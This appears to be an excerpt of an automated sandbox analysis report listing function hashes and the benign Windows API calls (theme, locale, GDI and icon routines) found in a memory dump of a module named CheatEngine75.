                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 603886cd130a0237f474d9db134c529dff7915508ef27cd73f091ebd1c2fb21e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64C02B3514030C37FB003BE28C1BF8A3B0C5B21A80F004020F70C85180DB79D01082BE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 6B4EFC07
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 6B4EFC3A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 6B4EFC59
                                                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 6B4EFFAC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Send$BeepState
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4005977132-0
                                                                                                                                                                                                                                      • Opcode ID: 075798bf50812aa4dfb064598689d0091577dadafa2b542d50cbea5736c000a4
                                                                                                                                                                                                                                      • Instruction ID: 1e64f3a5638ee02daed48ac5f73b465e10165fad553bb661f8c9f470df32cddd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 075798bf50812aa4dfb064598689d0091577dadafa2b542d50cbea5736c000a4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06D17936A01109FBEF11DBA4D984FDEBBB9FF05312F100596E512E7290D738AA46DB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 6B4E0F71
                                                                                                                                                                                                                                      • PathIsUNCW.SHLWAPI(?,?,?), ref: 6B4E1021
                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6B4E1045
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?,00000268,6B4E07DE,?,?,00000000), ref: 6B4E0FA4
                                                                                                                                                                                                                                        • Part of subcall function 6B4E0F25: GetLastError.KERNEL32(?,?,?,6B4E1056,?,?), ref: 6B4E0F31
                                                                                                                                                                                                                                        • Part of subcall function 6B4E0857: PathStripToRootW.SHLWAPI(00000000), ref: 6B4E088B
                                                                                                                                                                                                                                      • CharUpperW.USER32(?), ref: 6B4E1073
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 6B4E108B
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 6B4E1097
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Path$Find$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2323451338-0
                                                                                                                                                                                                                                      • Opcode ID: 41a42a55202d0d7facb0e732e7163897e325a02f66fa3e601d3a1f0191bee130
                                                                                                                                                                                                                                      • Instruction ID: 431a030423cf65e8950d2ab551d7356bd096e5ea7f61de5c2f490091c8c57e57
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41a42a55202d0d7facb0e732e7163897e325a02f66fa3e601d3a1f0191bee130
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 954196B1904115AFDB24AB35CC8AFBEB37CBF00715F004599E459E2250EF79AE42CA71
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6B615FC2: GetLastError.KERNEL32(00000000,?,6B61F6AE), ref: 6B615FC6
                                                                                                                                                                                                                                        • Part of subcall function 6B615FC2: SetLastError.KERNEL32(00000000,00000000,6B605FBB,00000008,000000FF), ref: 6B616068
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6B6238E0
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6B62392A
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6B6239F0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 661929714-0
                                                                                                                                                                                                                                      • Opcode ID: 1d8bd5f879c80fad1238116494c6666ee8db5b99ad4ff8cb38e1527db86dcd2d
                                                                                                                                                                                                                                      • Instruction ID: 0cb3cec6651cb43ffad55f9819b9808fffa1bce67ab1feaa611043e372c8679b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d8bd5f879c80fad1238116494c6666ee8db5b99ad4ff8cb38e1527db86dcd2d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D617EB19142179FFB288E29C982BAA77B8EF05700F1040BAE915C6684FB3CD984CF54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6B615FC2: GetLastError.KERNEL32(00000000,?,6B61F6AE), ref: 6B615FC6
                                                                                                                                                                                                                                        • Part of subcall function 6B615FC2: SetLastError.KERNEL32(00000000,00000000,6B605FBB,00000008,000000FF), ref: 6B616068
                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6B623B33
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                                      • Opcode ID: 716ac286ed74391eb5447eba94fd1890ec21d61bc092f8c073d6ef998a29c0e6
                                                                                                                                                                                                                                      • Instruction ID: a4676c58fc2f6aab374719e3c490ae00dc992566ce6c1af9dc4c3fbbdd360415
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 716ac286ed74391eb5447eba94fd1890ec21d61bc092f8c073d6ef998a29c0e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E21C2B6A14206AFFB288E29CC41EAA73B8EF65715B0040BAED05C7140EB3CE9408F54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6B615FC2: GetLastError.KERNEL32(00000000,?,6B61F6AE), ref: 6B615FC6
                                                                                                                                                                                                                                        • Part of subcall function 6B615FC2: SetLastError.KERNEL32(00000000,00000000,6B605FBB,00000008,000000FF), ref: 6B616068
                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(6B623ADF,00000001,?,?,-00000050,?,6B623E88,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6B62384B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                                      • Opcode ID: 643c5432f062c1aa55b629b73a1d131fe5915f0b296e587db3b7af5f158edbd2
                                                                                                                                                                                                                                      • Instruction ID: 4e3d611dc4c8cc92a22e5ea3f83b4f02c89e16f09813e5cb8e0464485b150938
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 643c5432f062c1aa55b629b73a1d131fe5915f0b296e587db3b7af5f158edbd2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8F0F6B63043085FEB245F39D881A6A7BA5FF80768B05447CFA468B650C7799C42CF54
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6B614C30: EnterCriticalSection.KERNEL32(-6B696968,?,6B61F391,00000000,6B689528,0000000C,6B61F359,80004005,?,6B618D00,80004005,?,6B616160,00000001,00000364,00000000), ref: 6B614C3F
                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(6B619A75,00000001,6B689428,0000000C,6B619EEA,00000000), ref: 6B619ABA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                                      • Opcode ID: d0322d7857e978783a8c5ceee68cc86d59f228780a8c4a78ff35bd72af4680bc
                                                                                                                                                                                                                                      • Instruction ID: f7b7dbeafcf0a954518d1e5ed406eaca423d63376bb67b6d16f50c7f58358751
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0322d7857e978783a8c5ceee68cc86d59f228780a8c4a78ff35bd72af4680bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3F037B2A05204EFDB00DFA9D542B9C77E0FB49728F00415AE515DB2D0CB7999058FA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,WINDOW,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511B8B
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,TOOLBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511BAA
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,BUTTON,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511BC9
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,STATUS,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511BE8
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,REBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511C07
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,COMBOBOX,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511C26
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,PROGRESS,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511C45
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,HEADER,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511C64
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,SCROLLBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511C83
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,EXPLORERBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511CA2
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,TREEVIEW,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511CC1
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,STARTPANEL,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511CE0
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,TASKBAND,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511CFF
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,TASKBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511D1E
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,SPIN,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511D3D
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,TAB,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511D5C
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,TOOLTIP,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511D7B
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(?,TRACKBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511D9A
                                                                                                                                                                                                                                      • OpenThemeData.UXTHEME(00000000,MENU,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511DB5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DataOpenTheme
                                                                                                                                                                                                                                      • String ID: BUTTON$COMBOBOX$EXPLORERBAR$HEADER$MENU$PROGRESS$REBAR$SCROLLBAR$SPIN$STARTPANEL$STATUS$TAB$TASKBAND$TASKBAR$TOOLBAR$TOOLTIP$TRACKBAR$TREEVIEW$WINDOW
                                                                                                                                                                                                                                      • API String ID: 1744092376-1233129369
                                                                                                                                                                                                                                      • Opcode ID: 662ea271bd320e352067cd332fe0f0c3a4d54f2ea7647c98f5355a4d27a9260b
                                                                                                                                                                                                                                      • Instruction ID: cb79fe64d93d76b969b4868ef709d33fb87f3200837e46731044d16b37c21c64
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 662ea271bd320e352067cd332fe0f0c3a4d54f2ea7647c98f5355a4d27a9260b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C6123B9B5C7259FFB00AF768949D967BA4BF3AB4830059E4F904D7221EB7CD4008B94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 6B4FEABB
                                                                                                                                                                                                                                      • CopyImage.USER32 ref: 6B4FEAF1
                                                                                                                                                                                                                                        • Part of subcall function 6B50209F: __EH_prolog3_GS.LIBCMT ref: 6B5020A9
                                                                                                                                                                                                                                        • Part of subcall function 6B50209F: GetObjectW.GDI32(?,00000018,?), ref: 6B5020D1
                                                                                                                                                                                                                                        • Part of subcall function 6B50209F: GetObjectW.GDI32(?,00000054,?), ref: 6B502116
                                                                                                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 6B4FEB2B
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 6B4FEBA8
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 6B4FEBD6
                                                                                                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 6B4FEBF2
                                                                                                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 6B4FEC3C
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 6B4FEC5F
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 6B4FEC96
                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6B4FECBC
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 6B4FECD7
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 6B4FED07
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 6B4FED25
                                                                                                                                                                                                                                      • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6B4FED64
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 6B4FED79
                                                                                                                                                                                                                                      • BitBlt.GDI32(?,?,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6B4FEDAF
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 6B4FEDC1
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 6B4FEDD2
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 6B4FEDE3
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 6B4FEE2B
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 6B4FEE43
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 6B4FEE54
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 6B4FEE60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$Select$Delete$CompatibleCreate$H_prolog3_$BitmapCopyImage
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1780083495-0
                                                                                                                                                                                                                                      • Opcode ID: 45c730fe826e9f19bbc520df5af21c95703c145703d06858a98c0cb7041bbb56
                                                                                                                                                                                                                                      • Instruction ID: 5e47b1a0fa2363c3cbfccffdae29eff5810fe77676061cc28fcc0c08343a14df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45c730fe826e9f19bbc520df5af21c95703c145703d06858a98c0cb7041bbb56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDA1F770911629EFDB219F61CC84FE9BBB9BF49301F0042D8E659A3260DB359E91DF90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 6B4EAA16
                                                                                                                                                                                                                                      • GetIconInfo.USER32(?,?), ref: 6B4EAAB7
                                                                                                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 6B4EAAC6
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 6B4EAAF5
                                                                                                                                                                                                                                      • CopyImage.USER32(?,00000000,00000000,00000000,00002000), ref: 6B4EAB11
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 6B4EAB26
                                                                                                                                                                                                                                      • FillRect.USER32(?,?,?), ref: 6B4EAB69
                                                                                                                                                                                                                                      • DrawIconEx.USER32(?,00000000,00000000,?,?,?,00000000,00000000,00000003), ref: 6B4EAB8A
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 6B4EAB9B
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 6B4EABA4
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 6B4EABB9
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 6B4EABC2
                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,00000070,6B4EA508,?,00000000,00000000,00000000,00000000,00000000), ref: 6B4EAC15
                                                                                                                                                                                                                                      • DestroyIcon.USER32(?), ref: 6B4EAC22
                                                                                                                                                                                                                                      • DestroyIcon.USER32(?), ref: 6B4EAC2D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
